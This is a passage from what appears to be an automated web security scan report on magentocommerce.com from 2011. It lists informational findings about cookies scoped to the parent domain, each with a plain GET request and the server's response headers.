Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.11. http://www.magentocommerce.com/boards/viewforum/10252/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewforum/10252/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176393; expires=Sat, 11-Aug-2012 15:13:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewforum%2F10252%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:16 GMT
Content-Length: 112502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.12. http://www.magentocommerce.com/boards/viewthread/1647/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewthread/1647/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewthread/1647/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176416; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewthread%2F1647%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: exp_forum_topics=a%3A0%3A%7B%7D; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:37 GMT
Content-Length: 116291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.13. http://www.magentocommerce.com/bug-tracking

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /bug-tracking

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bug-tracking HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176426; expires=Sat, 11-Aug-2012 15:13:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbug-tracking%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:46 GMT
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.14. http://www.magentocommerce.com/casestudies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /casestudies

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /casestudies HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176318; expires=Sat, 11-Aug-2012 15:11:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fcasestudies%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:58 GMT
Content-Length: 52582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.15. http://www.magentocommerce.com/company/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175799; expires=Sat, 11-Aug-2012 15:03:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcompany%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:19 GMT
Content-Length: 45865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.16. http://www.magentocommerce.com/company/careers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.17. http://www.magentocommerce.com/company/contact-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.18. http://www.magentocommerce.com/company/contact-us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.19. http://www.magentocommerce.com/company/contact-us/thank_you

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/thank_you

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us/thank_you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175794; expires=Sat, 11-Aug-2012 15:03:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcompany%2Fcontact-us%2Fthank_you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:14 GMT
Content-Length: 32829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.20. http://www.magentocommerce.com/company/events

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/events HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175835; expires=Sat, 11-Aug-2012 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:55 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.21. http://www.magentocommerce.com/company/events/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/events/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175850; expires=Sat, 11-Aug-2012 15:04:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:11 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.22. http://www.magentocommerce.com/company/inthepress

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/inthepress HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175806; expires=Sat, 11-Aug-2012 15:03:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:26 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.23. http://www.magentocommerce.com/company/inthepress/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/inthepress/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175861; expires=Sat, 11-Aug-2012 15:04:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.24. http://www.magentocommerce.com/company/jobs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.25. http://www.magentocommerce.com/company/leadership

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/leadership HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175804; expires=Sat, 11-Aug-2012 15:03:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:24 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...

3.26. http://www.magentocommerce.com/company/leadership/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/leadership/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:57 GMT
